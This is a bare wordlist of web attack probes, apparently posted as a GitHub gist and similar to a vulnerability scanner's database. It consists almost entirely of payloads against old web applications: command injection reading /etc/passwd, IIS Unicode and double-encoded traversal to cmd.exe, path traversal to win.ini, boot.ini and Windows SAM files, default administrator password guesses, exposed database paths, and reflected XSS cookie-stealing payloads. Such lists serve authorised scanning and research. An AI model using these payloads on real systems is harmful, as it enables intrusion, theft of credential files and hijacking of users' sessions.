shop/normal_html.cgi?file=;cat%20/etc/passwd|
shop/normal_html.cgi?file=|cat%20/etc/passwd|
shop/member_html.cgi?file=;cat%20/etc/passwd|
shop/member_html.cgi?file=|cat%20/etc/passwd|
cgi-bin/sendform.cgi
boilerplate.asp?NFuse_Template=.../.../.../.../.../.../.../.../.../boot.ini&NFuse_CurrentFolder=/
proxy/ssllogin?user=administrator&password=administrator
proxy/ssllogin?user=administrator&password=operator
proxy/ssllogin?user=administrator&password=user
cgi-bin/FileSeek.cgi?head=&foot=;cat%20/etc/passwd
cgi-bin/FileSeek.cgi?head=;cat%20/etc/passwd|&foot=
cgi-bin/FileSeek2.cgi?head=&foot=;cat%20/etc/passwd
cgi-bin/FileSeek2.cgi?head=;cat%20/etc/passwd|&foot=
cgi-bin/FileSeek.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd
cgi-bin/FileSeek.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=
cgi-bin/FileSeek2.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd
cgi-bin/FileSeek2.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=
project/index.php?m=projects&user_cookie=1
webcalendar/colors.php?color=</script><script>alert(document.cookie)</script>
webcalendar/week.php?user=\"><script>alert(document.cookie)</script>
active.log
?pattern=/etc/*&sort=name
images/?pattern=/etc/*&sort=name
debug/dbg?host==<script>alert('Vulnerable');</script>
debug/echo?name=<script>alert('Vulnerable');</script>
debug/errorInfo?title===<script>alert('Vulnerable');</script>
debug/showproc?proc===<script>alert('Vulnerable');</script>
site/eg/source.asp
PHPMYADMINexport.php?what=../../../../../../../../../../../../etc/passwd%00
~nobody/etc/passwd
admin/db.php
admin/db.php?dump_sql=1
dcforum/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00
cgi-bin/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00
iissamples/exair/search/advsearch.asp
isqlplus
data/member_log.txt
data/userlog/log.txt
userlog.php
internal.sws?../../../../../../../../winnt/win.ini
internal.sws?.../.../.../.../.../.../.../.../winnt/win.ini
ASP/cart/database/metacart.mdb
database/metacart.mdb
mcartfree/database/metacart.mdb
metacart/database/metacart.mdb
shop/database/metacart.mdb
shoponline/fpdb/shop.mdb
shopping/database/metacart.mdb
search.php?sess=your_session_id&lookfor=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
admin/phpinfo.php
start.php?config=alper.inc.php
login.php?sess=your_session_id&abt=&new_lang=99999&caller=navlang
viewimg.php?path=../../../../../../../../../../etc/passwd&form=1&var=1
cgi-bin/gettransbitmap
cgi-bin/guestbook.cgi?user=cpanel&template=|/bin/cat%20/etc/passwd|
JUNK(5).xml
JUNK(5)/
cgi-bin/main_menu.pl
ban.bak
ban.dat
ban.log
banmat.pwd
admin/adminproc.asp
admin/datasource.asp
utils/sprc.asp
reports/temp/
cgi-bin/rtm.log
cgi-bin/VsSetCookie.exe?
addressbook.php?\"><script>alert(Vulnerable)</script><!--
options.php?optpage=<script>alert('Vulnerable!')</script>
search.php?mailbox=INBOX&what=x&where=<script>alert('Vulnerable!')</script>&submit=Search
help.php?chapter=<script>alert('Vulnerable')</script>
src/read_body.php?mailbox=%3Cscript%3Ealert(Vulnerable)%3C%2Fscript%3E&passed_id=%3Cscript%3Ealert(Vulnerable)%3C%2Fscript%3E&startMessage=1&show_more=0
cgi-bin/powerup/r.cgi?FILE=../../../../../../../../../../etc/passwd
cgi-bin/r.cgi?FILE=../../../../../../../../../../etc/passwd
cgi-bin/Webnews.exe
cgi-bin/webnews.pl
.../.../.../
cgi-bin/texis.exe/junk
cgi-bin/texis/junk
texis.exe/?-dump
texis.exe/?-version
cgi-bin/apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/
acart2_0/deliver.asp?msg=<script>alert(\"test\")</script>
acart2_0/error.asp?msg=<script>alert(\"test\")</script>
acart2_0/admin/error.asp?msg=<script>alert(\"test\")</script>
acart2_0/admin/index.asp?msg=<script>alert(\"test\")</script>
cgi-bin/sensepost.exe?/c+dir
certsrv/..%c0%af../winnt/system32/cmd.exe?/c+dir
cgi-bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
iisadmpwd/..%c0%af../winnt/system32/cmd.exe?/c+dir
msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
pbserver/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
rpc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\"
_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
acart2_0/acart2_0.mdb
acart2_0/admin/category.asp
Sites/Knowledge/Membership/Inspired/ViewCode.asp
Sites/Knowledge/Membership/Inspiredtutorial/ViewCode.asp
Sites/Samples/Knowledge/Membership/Inspired/ViewCode.asp
Sites/Samples/Knowledge/Membership/Inspiredtutorial/ViewCode.asp
Sites/Samples/Knowledge/Push/ViewCode.asp
Sites/Samples/Knowledge/Search/ViewCode.asp
SiteServer/Publishing/ViewCode.asp
siteserver/publishing/viewcode.asp?source=/default.asp
shoutbox.php?conf=../../../../../../../etc/passwd
securelogin/1,2345,A,00.html
.%252e/.%252e/.%252e/winnt/boot.ini
add.php
class/mysql.class
inc/sendmail.inc
admin/system.php3?cmd=cat%20/etc/passwd
admin/system.php3?cmd=dir%20c:\
admin/exec.php3?cmd=cat%20/etc/passwd
admin/exec.php3?cmd=dir%20c:\
foo.php3
config.inc
sysuser/docmgr/ieedit.stm?url=../
sysuser/docmgr/iecreate.stm?template=../
wwwping/index.stm?wwwsite=<script>alert(document.cookie)</script>
sysuser/docmgr/create.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/edit.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/ftp.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/htaccess.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/iecreate.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/ieedit.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/info.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/mkdir.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/rename.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/search.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/sendmail.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/template.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/update.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/vccheckin.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/vccreate.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/vchist.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/edit.stm?name=<script>alert(document.cookie)</script>
sysuser/docmgr/ieedit.stm?name=<script>alert(document.cookie)</script>
sysuser/docmgr/info.stm?name=<script>alert(document.cookie)</script>
sysuser/docmgr/rename.stm?name=<script>alert(document.cookie)</script>
sysuser/docmgr/sendmail.stm?name=<script>alert(document.cookie)</script>
sysuser/docmgr/update.stm?name=<script>alert(document.cookie)</script>
sysuser/docmgr/vccheckin.stm?name=<script>alert(document.cookie)</script>
sysuser/docmgr/vccreate.stm?name=<script>alert(document.cookie)</script>
sysuser/docmgr/vchist.stm?name=<script>alert(document.cookie)</script>
cgi-bin/testcgi.exe?<script>alert(document.cookie)</script>
cgi-bin/environ.pl?param1=<script>alert(document.cookie)</script>
syshelp/stmex.stm?foo=123&bar=<script>alert(document.cookie)</script>
syshelp/stmex.stm?foo=<script>alert(document.cookie)</script>
syshelp/cscript/showfunc.stm?func=<script>alert(document.cookie)</script>
syshelp/cscript/showfncs.stm?pkg=<script>alert(document.cookie)</script>
syshelp/cscript/showfnc.stm?pkg=<script>alert(document.cookie)</script>
netutils/ipdata.stm?ipaddr=<script>alert(document.cookie)</script>
netutils/findata.stm?host=<script>alert(document.cookie)</script>
netutils/findata.stm?user=<script>alert(document.cookie)</script>
sysuser/docmgr/search.stm?query=<script>alert(document.cookie)</script>
isapi/tstisapi.dll
cgi-bin/bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
NUKEbb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/jabber/comment2.jse+/system/autoexec.ncf
lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/viewcode.jse+httplist+httplist/../../../../../system/autoexec.ncf
cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd
catinfo
soap/servlet/soaprouter
opendir.php?/etc/passwd
opendir.php?requesturl=/etc/passwd
webtools/bonsai/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD
cgi-bin/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD
webtools/bonsai/cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>
webtools/bonsai/cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week
cgi-bin/cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>
cgi-bin/cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week
webtools/bonsai/cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script>
webtools/bonsai/cvslog.cgi?file=<script>alert('Vulnerable')</script>
cgi-bin/cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script>
cgi-bin/cvslog.cgi?file=<script>alert('Vulnerable')</script>
webtools/bonsai/cvsblame.cgi?file=<script>alert('Vulnerable')</script>
cgi-bin/cvsblame.cgi?file=<script>alert('Vulnerable')</script>
webtools/bonsai/showcheckins.cgi?person=<script>alert('Vulnerable')</script>
cgi-bin/showcheckins.cgi?person=<script>alert('Vulnerable')</script>
JUNK(223)<font%20size=50>DEFACED<!--//--
MWS/HandleSearch.html?searchTarget=test&B1=Submit
cgi-bin/a1disp3.cgi?../../../../../../../../../../etc/passwd
cgi-bin/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd
cgi-bin/a1stats/a1disp3.cgi?../../../../../../../etc/passwd
cgi-bin/a1stats/a1disp4.cgi?../../../../../../../etc/passwd
certsrv/..%255cwinnt/system32/cmd.exe?/c+dir
cgi-bin/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
iisadmpwd/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
pbserver/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
rpc/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ver
_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
server-info
cgi-bin/namazu.cgi
oekaki/
.nsconfig
cgi-bin/.nsconfig
?D=A
?N=D
?S=A
?M=A
cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%49%4E%4E%54%2F%73%79%73%74%65%6D%33%32%2Fping.exe%20127.0.0.1
cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%69%6E%64%6F%77%73%2Fping.exe%20127.0.0.1
dc/auth_data/auth_user_file.txt
dc/orders/orders.txt
dcshop/auth_data/auth_user_file.txt
dcshop/orders/orders.txt
cgi-bin/shop.pl/page=;cat%20shop.pl|
cgi-shop/view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00
cgi-bin/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd|
cgi-bin/eshop.pl/seite=;cat%20eshop.pl|
JUNK(223)<font%20size=50><script>alert('Vulnerable')</script><!--//--
cgi-bin/ion-p.exe?page=c:\winnt\repair\sam
cgi-bin/ion-p?page=../../../../../etc/passwd
..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cboot.ini
..%5C..%5C..%5C..%5C..%5C..%5C/winnt/win.ini
applist.asp
launch.asp?NFuse_Application=LookOut&NFuse_MIMEExtension=.ica
_layouts/alllibs.htm
_layouts/settings.htm
_layouts/userinfo.htm
cgi-bin/index.pl
cgi-bin/rwcgi60
cgi-bin/rwcgi60/showenv
cgi-bin/classifieds/classifieds.cgi
cgi-bin/calendar/index.cgi
stronghold-info
stronghold-status
blah-whatever.jsp
gallery/index.php?include=../../../../../../../../../etc/passwd
modules.php?set_albumName=album01&id=aaw&op=modload&name=gallery&file=index&include=../../../../../../../../../etc/passwd
cgi-bin/../../../../../../../../../../WINNT/system32/ipconfig.exe
cgi-bin/NUL/../../../../../../../../../WINNT/system32/ipconfig.exe
cgi-bin/PRN/../../../../../../../../../WINNT/system32/ipconfig.exe
phprocketaddin/?page=../../../../../../../../../../etc/passwd
cgi-bin/store/agora.cgi?cart_id=<script>alert('Vulnerable')</script>
iissamples/exair/howitworks/Code.asp
iissamples/exair/howitworks/Codebrw1.asp
msadc/Samples/selector/showcode.asp?source=/msadc/Samples/../../../../../../../../../winnt/win.ini
pls/dadname/htp.print?cbuf=<script>alert('Vulnerable')</script>
pls/help/<script>alert('Vulnerable')</script>
demo/ojspext/events/globals.jsa
globals.jsa
pls/sample/admin_/help/..%255cplsql.conf
servlet/oracle.xml.xsql.XSQLServlet/xsql/lib/XSQLConfig.xml
..%252f..%252f..%252f..%252f..%252f../windows/repair/sam
..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam
..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam._
..%255c..%255c..%255c..%255c..%255c../windows/repair/sam
..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam
..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam._
..%2F..%2F..%2F..%2F..%2F../windows/repair/sam
..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam
..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam._
ans.pl?p=../../../../../usr/bin/id|&blah
ans/ans.pl?p=../../../../../usr/bin/id|&blah
cgi-bin/csSearch.cgi?command=savesetup&setup=`cat%20/etc/passwd`
?\"><script>alert('Vulnerable');</script>
JUNK(10)abcd.html
iissamples/exair/howitworks/codebrws.asp
servlet/com.newatlanta.servletexec.JSP10Servlet/..%5c..%5cglobal.asa
servlet/com.newatlanta.servletexec.JSP10Servlet/
iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/bogus_directory/nonexistent.asp
iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp
error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini
error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini
iissamples/exair/search/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
iissamples/exair/search/search.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
pass_done.php
admin/admin.php?adminpy=1
iishelp/iis/htm/tutorial/redirect.asp
Citrix/PNAgent/
Citrix/ICAWEB/
IBMWebAS/
IBMWebAS/docs/
IBMWebAS/apidocs/
IBMWebAS/configDocs/
IBMWebAS/mbeanDocs/
iishelp/iis/misc/default.asp
Citrix/MetaFrameXP/default/login.asp
manager/html-manager-howto.html
manager/manager-howto.html
includes/adovbs.inc
adovbs.inc
fcgi-bin/echo
fcgi-bin/echo2
pls/ldc/admin_/
demo/basic/simple/viewsrc/welcomeuser.jsp.txt
README
demo/xml/xmlquery/viewsrc/XMLQuery.jsp.txt
soapdocs/webapps/soap/
soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml
shopadmin.asp?Password=abc&UserName="><script>alert(foo)</script>
phpinfo.php?GLOBALS[test]=<script>alert(document.cookie);</script>
phpinfo.php?cx[]=JUNK(4096)<script>alert(foo)</script>
j2ee/
cgi-bin/printenv.tmp
perl/printenv
perl-status
WebCacheDemo.html
webcache/
webcache/webcache.xml
bmp/
bmp/global-web-application.xml
bmp/JSPClient.java
bmp/mime.types
bmp/README.txt
bmp/sqljdemo.jsp
bmp/setconn.jsp
ptg_upgrade_pkg.log
OA_HTML/oam/weboam.log
webapp/admin/_pages/_bc4jadmin/
_pages/_webapp/_admin/_showpooldetails.java
_pages/_webapp/_admin/_showjavartdetails.java
_pages/_demo/
_pages/_webapp/_jsp/
_pages/_demo/_sql/
/OA_HTML/_pages/
OA_HTML/webtools/doc/index.html
reports/rwservlet?server=repserv+report=/tmp/hacker.rdf+destype=cache+desformat=PDF
apex/
OA_JAVA/
OA_HTML/
aplogon.html
appdet.html
servlets/weboam/oam/oamLogin
OA_HTML/PTB/mwa_readme.htm
reports/rwservlet
reports/rwservlet/showenv
reports/rwservlet/showmap
reports/rwservlet/showjobs
reports/rwservlet/getjobid7?server=myrep
reports/rwservlet/getjobid4?server=myrep
reports/rwservlet/showmap?server=myserver
pls/portal/owa_util.cellsprint?p_theQuery=select
pls/portal/owa_util.listprint?p_theQuery=select
pls/portal/owa_util.show_query_columns?ctable=sys.dba_users
pls/portal/owa_util.showsource?cname=owa_util
pls/portal/owa_util.cellsprint?p_theQuery=select+*+from+sys.dba_users
pls/portal/owa_util.signature
pls/portal/HTP.PRINT
pls/portal/CXTSYS.DRILOAD.VALIDATE_STMT
pls/portal/PORTAL_DEMO.ORG_CHART.SHOW
pls/portal/PORTAL.wwv_form.genpopuplist
pls/portal/PORTAL.wwv_ui_lovf.show
pls/portal/PORTAL.wwa_app_module.link
pls/portal/PORTAL.wwv_dynxml_generator.show
pls/portal/PORTAL.home
pls/portal/PORTAL.wwv_setting.render_css
pls/portal/PORTAL.wwv_main.render_warning_screen?p_oldurl=inTellectPRO&p_newurl=inTellectPRO
pls/portal/SELECT
pls/portal/null
OA_MEDIA/
OA_HTML/META-INF/
OA_HTML/jsp/por/services/login.jsp
OA_HTML/PTB/ICXINDEXBASECASE.htm
OA_HTML/PTB/ECXOTAPing.htm
OA_HTML/PTB/xml_sample1.htm
OA_HTML/jsp/wf/WFReassign.jsp
OA_JAVA/Oracle/
OA_JAVA/servlet.zip
OA_JAVA/oracle/forms/registry/Registry.dat
OA_HTML/oam/
OA_HTML/jsp/
OA_HTML/jsp/fnd/fndversion.jsp
OA_HTML/jsp/fnd/fndhelp.jsp?dbc=/u01/oracle/prodappl/fnd/11.5.0/secure/dbprod2_prod.dbc
OA_HTML/jsp/fnd/fndhelputil.jsp
install/install.php
_vti_bin/shtml.dll/_vti_rpc
cehttp/trace
cehttp/property/
webdav/index.html
hp-ux/
hp_docs/
hp_docs/cgi-bin/index.cgi
hp_docs/xmltools/
cgi-bin/showuser.cgi
cgi-bin/man2html
status?full=true
rpc.php?q="><script>alert(document.cookie)</script>
db.php?q='&t='
rpc.php?q='&t='
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment